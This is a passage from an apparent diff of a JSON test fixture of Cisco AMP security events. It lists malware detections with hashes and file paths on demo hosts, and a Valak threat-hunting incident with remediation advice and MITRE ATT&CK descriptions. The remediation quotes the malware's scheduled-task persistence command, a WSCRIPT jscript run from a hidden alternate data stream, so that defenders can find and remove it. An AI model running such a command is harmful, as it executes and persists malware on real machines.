Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669409347600427","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669409347600000,"timestamp":1610705999,"timestamp_nanoseconds":240000000,"date":"2021-01-15T10:19:59+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669409347600426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669405052633000,"timestamp":1610705998,"timestamp_nanoseconds":847000000,"date":"2021-01-15T10:19:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669405052633129","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669147354595000,"timestamp":1610705938,"timestamp_nanoseconds":375000000,"date":"2021-01-15T10:18:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669147354595368","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669147354595000,"timestamp":1610705938,"timestamp_nanoseconds":360000000,"date":"2021-01-15T10:18:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669147354595367","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669143059628000,"timestamp":1610705937,"timestamp_nanoseconds":968000000,"date":"2021-01-15T10:18:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669143059628070","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259286289613000,"timestamp":1610705905,"timestamp_nanoseconds":669000000,"date":"2021-01-15T10:18:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259286289612895","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259234750005000,"timestamp":1610705893,"timestamp_nanoseconds":657000000,"date":"2021-01-15T10:18:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259234750005342","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259183210398000,"timestamp":1610705881,"timestamp_nanoseconds":645000000,"date":"2021-01-15T10:18:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259183210397789","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180335966167761000,"timestamp":1610705878,"timestamp_nanoseconds":875000000,"date":"2021-01-15T10:17:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6180335966167760897","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":672000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590309","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":653000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590308","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":260000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259135965757000,"timestamp":1610705870,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259135965757532","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900291000600,"timestamp":1610705861,"timestamp_nanoseconds":291000000,"date":"2021-01-15T10:17:41+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.3372C1EDAB-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705861,"start_date":"2021-01-15T10:17:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":613000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":114000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163569","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
\ No newline at end of file
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"timestamp":1610711992,"timestamp_nanoseconds":155518026,"date":"2021-01-15T11:59:52+00:00","event_type":"SecureX Threat Hunting Incident","event_type_id":1107296344,"connector_guid":"test_connector_guid","severity":"Critical","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Threat_Hunting","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"87:c2:d9:a2:8c:74"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"threat_hunting":{"incident_report_guid":"6e5292d5-248c-49dc-839d-201bcba64562","incident_hunt_guid":"4bdbaf20-020f-4bb5-9da9-585da0e07817","incident_title":"Valak Variant","incident_summary":"The host Demo_Threat_Hunting is compromised by a Valak malware variant.  Valak is a multi-stage malware attack that uses screen capture, reconnaissance, geolocation, and fileless execution techniques to infiltrate and exfiltrate sensitive information.  Based on the event details listed and the techniques used, we recommend the host in question be investigated further.","incident_remediation":"We recommend the following:\r\n\r\n- Isolation of the affected hosts from the network\r\n- Perform forensic investigation\r\n    - Review all activity performed by the user\r\n    - Upload any suspicious files to ThreatGrid for analysis\r\n    - Search the registry for data \"var config = ( COMMAND_C2\" and remove the key\r\n    - Review scheduled tasks and cancel any involving the execution of WSCRIPT.EXE //E:jscript C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone lqjsxokgowhbxjaetyrifnbigtcxmuj eimljujnv\r\n    - Remove the Alternate Data Stream file located C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone.\r\n- If possible, reimage the affected system to prevent potential unknown persistence methods.","incident_id":416,"tactics":[{"name":"Defense Evasion","description":"<p>The adversary is trying to avoid being detected.</p>\n\n<p>Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.</p>\n","external_id":"TA0005","mitre_name":"tactic","mitre_url":"https://attack.mitre.org/tactics/TA0005"}],"techniques":[{"name":"Data from Local System","description":"<p>Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.</p>\n\n<p>Adversaries may do this using a <a href=\"https://attack.mitre.org/techniques/T1059\">Command and Scripting Interpreter</a>, such as <a href=\"https://attack.mitre.org/software/S0106\">cmd</a>, which has functionality to interact with the file system to gather information. Some adversaries may also use <a href=\"https://attack.mitre.org/techniques/T1119\">Automated Collection</a> on the local system.</p>\n","external_id":"T1005","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1005","tactics_names":"Collection","platforms":"Linux, macOS, Windows","system_requirements":"Privileges to access certain files and directories","permissions":"","data_sources":"File monitoring, Process monitoring, Process command-line parameters"},{"name":"Scheduled Task/Job","description":"<p>Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)</p>\n\n<p>Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).</p>\n","external_id":"T1053","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1053","tactics_names":"Execution, Persistence, Privilege Escalation","platforms":"Windows, Linux, macOS","system_requirements":null,"permissions":"Administrator, SYSTEM, User","data_sources":"File monitoring, Process monitoring, Process command-line parameters, Windows event logs"},{"name":"Scripting","description":"<p><strong>This technique has been deprecated. Please use <a href=\"https://attack.mitre.org/techniques/T1059\">Command and Scripting Interpreter</a> where appropriate.</strong></p>\n\n<p>Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and <a href=\"https://attack.mitre.org/techniques/T1086\">PowerShell</a> but could also be in the form of command-line batch scripts.</p>\n\n<p>Scripts can be embedded inside Office documents as macros that can be set to execute when files used in <a href=\"https://attack.mitre.org/techniques/T1193\">Spearphishing Attachment</a> and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through <a href=\"https://attack.mitre.org/techniques/T1203\">Exploitation for Client Execution</a>, where adversaries will rely on macros being allowed or that the user will accept to activate them.</p>\n\n<p>Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)</p>\n","external_id":"T1064","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1064","tactics_names":"Defense Evasion, Execution","platforms":"Linux, macOS, Windows","system_requirements":null,"permissions":"User","data_sources":"Process monitoring, File monitoring, Process command-line parameters"}],"severity":"critical","incident_start_time":1610707688,"incident_end_time":1592478770},"tactics":[{"name":"Defense Evasion","description":"<p>The adversary is trying to avoid being detected.</p>\n\n<p>Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.</p>\n","external_id":"TA0005","mitre_name":"tactic","mitre_url":"https://attack.mitre.org/tactics/TA0005"}],"techniques":[{"name":"Data from Local System","description":"<p>Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.</p>\n\n<p>Adversaries may do this using a <a href=\"https://attack.mitre.org/techniques/T1059\">Command and Scripting Interpreter</a>, such as <a href=\"https://attack.mitre.org/software/S0106\">cmd</a>, which has functionality to interact with the file system to gather information. Some adversaries may also use <a href=\"https://attack.mitre.org/techniques/T1119\">Automated Collection</a> on the local system.</p>\n","external_id":"T1005","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1005","tactics_names":"Collection","platforms":"Linux, macOS, Windows","system_requirements":"Privileges to access certain files and directories","permissions":"","data_sources":"File monitoring, Process monitoring, Process command-line parameters"},{"name":"Scheduled Task/Job","description":"<p>Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)</p>\n\n<p>Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated 